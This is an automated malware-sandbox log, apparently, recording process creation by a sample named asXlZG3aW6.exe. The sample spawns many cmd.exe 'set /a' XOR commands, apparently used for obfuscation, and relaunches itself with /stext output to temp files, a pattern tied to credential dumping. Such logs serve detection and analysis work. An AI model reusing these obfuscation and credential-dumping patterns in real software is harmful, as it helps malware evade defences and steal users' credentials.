              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe "C:\Users\user\Desktop\asXlZG3aW6.exe"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
